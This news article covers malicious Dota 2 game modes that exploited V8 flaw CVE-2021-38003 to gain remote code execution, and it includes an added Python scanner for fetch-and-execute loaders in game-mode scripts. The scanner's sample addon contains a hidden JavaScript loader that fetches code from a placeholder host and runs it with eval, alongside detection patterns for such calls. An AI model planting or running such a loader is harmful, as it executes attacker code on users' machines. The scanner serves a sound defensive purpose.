Hackers Create Malicious Dota 2 Game Modes to Secretly Access Players’ Systems

Feb 13, 2023 | Ravie Lakshmanan | Game Hacking / Cyber Threat

An unknown threat actor created malicious game modes for the Dota 2 multiplayer online battle arena (MOBA) video game that could have been exploited to establish backdoor access to players' systems.

The modes exploited a high-severity flaw in the V8 JavaScript engine tracked as CVE-2021-38003 (CVSS score: 8.8), which was exploited as a zero-day and addressed by Google in October 2021.

"Since V8 was not sandboxed in Dota, the exploit on its own allowed for remote code execution against other Dota players," Avast researcher Jan Vojtěšek said in a report published last week.

Following responsible disclosure to Valve, the game publisher shipped fixes on January 12, 2023, by upgrading the version of V8.

Game modes are essentially custom capabilities that can either extend an existing title or offer entirely new gameplay in a manner that deviates from the standard rules.

While publishing a custom game mode to the Steam store includes a vetting process by Valve, the malicious game modes discovered by the antivirus vendor managed to slip through the cracks.

These game modes, which have since been taken down, are "test addon plz ignore," "Overdog no annoying heroes," "Custom Hero Brawl," and "Overthrow RTZ Edition X10 XP." The threat actor is also said to have published a fifth game mode named Brawl in Petah Tiqwa that didn't pack any rogue code.

Embedded within "test addon plz ignore" is an exploit for the V8 flaw that could be weaponized to execute custom shellcode.

The three others, on the other hand, take a more covert approach: the malicious code is designed to reach out to a remote server to fetch a JavaScript payload, which is likely also an exploit for CVE-2021-38003, though this could not be confirmed because the server is no longer reachable.

In a hypothetical attack scenario, a player launching one of the above game modes could be targeted by the threat actor to gain remote access to the infected host and deploy additional malware for further exploitation.
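The covert variant described above has a recognizable shape from a defender's point of view: a script bundled with a custom game mode that both contacts a remote host and hands whatever it receives to a dynamic code-execution sink. The following scanner, added here as an illustration and not code from Avast, Valve or the article, applies that heuristic to a constructed set of game-mode UI scripts. The file layout, the sample script contents and the Panorama `$.AsyncWebRequest` pattern name are assumptions for the example, not taken from the article.

```python
"""Heuristic static scan of custom game-mode scripts for a
'fetch remote JavaScript, then execute it' loader pattern.

Added example; not code from Avast, Valve or the article.
Assumptions (constructed for this example):
  - the game mode's UI scripts are plain JavaScript files keyed by path;
  - a loader of the kind described needs BOTH a network source and a
    dynamic code-execution sink in the same script, so flagging either
    alone would be noisy, while the combination is a strong signal.
"""
import re
from dataclasses import dataclass, field

# Network sources: anything that can reach out to a remote host.
NETWORK_PATTERNS = [
    r"\bfetch\s*\(",
    r"\bXMLHttpRequest\b",
    r"\$\.AsyncWebRequest\s*\(",   # Panorama HTTP helper (assumed name)
]

# Dynamic code sinks: anything that turns a string into executable code.
SINK_PATTERNS = [
    r"\beval\s*\(",
    r"\bnew\s+Function\s*\(",
    r"\bsetTimeout\s*\(\s*['\"]",  # setTimeout with a string body
]

URL_PATTERN = r"https?://[^\s'\"]+"


@dataclass
class Finding:
    path: str
    network_hits: list = field(default_factory=list)
    sink_hits: list = field(default_factory=list)
    urls: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Loader signature: remote fetch AND dynamic execution in one script.
        return bool(self.network_hits) and bool(self.sink_hits)


def scan_script(path: str, source: str) -> Finding:
    """Collect network calls, code sinks and literal URLs from one script."""
    finding = Finding(path)
    for pattern in NETWORK_PATTERNS:
        finding.network_hits += [m.group(0) for m in re.finditer(pattern, source)]
    for pattern in SINK_PATTERNS:
        finding.sink_hits += [m.group(0) for m in re.finditer(pattern, source)]
    finding.urls = re.findall(URL_PATTERN, source)
    return finding


def scan_addon(files: dict) -> list:
    """Scan every script in an addon; `files` maps path -> source text."""
    return [scan_script(path, source) for path, source in files.items()]


# Constructed sample addon: one benign UI script, one hidden loader.
SAMPLE_ADDON = {
    "scripts/custom_ui/hud.js": """
        // benign: updates a score label from local game state
        var label = $('#ScoreLabel');
        function onTick(score) { label.text = String(score); }
    """,
    "scripts/custom_ui/compat.js": """
        // hidden loader: pulls code from a remote host and runs it
        var u = 'http://example.invalid/stage2.js';
        fetch(u).then(function (r) { return r.text(); })
                .then(function (code) { eval(code); });
    """,
}


def suspicious_paths(files=SAMPLE_ADDON) -> list:
    """Paths of scripts that match the fetch-and-execute signature."""
    return [f.path for f in scan_addon(files) if f.suspicious]


if __name__ == "__main__":
    for finding in scan_addon(SAMPLE_ADDON):
        flag = "SUSPICIOUS" if finding.suspicious else "ok"
        print(f"{flag:10} {finding.path} urls={finding.urls}")
```

Run against the constructed addon, the scanner flags only `compat.js`, and the extracted URL gives a reviewer the host to examine further. The heuristic is deliberately conservative: a script that only fetches (for example, pulling a leaderboard) or only uses `eval` on local data is reported as hits but not as suspicious, which keeps the signal usable when reviewing many community-submitted modes.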

It's not immediately known what the developer's end goals were in creating the game modes, but they're unlikely to have been for benign research purposes, Avast noted.

"First, the attacker did not report the vulnerability to Valve (which would generally be considered a nice thing to do)," Vojtěšek said. "Second, the attacker tried to hide the exploit in a stealthy backdoor."

"Regardless, it is also possible that the attacker did not have purely malicious intentions either, since such an attacker could arguably abuse this vulnerability with a much larger impact."
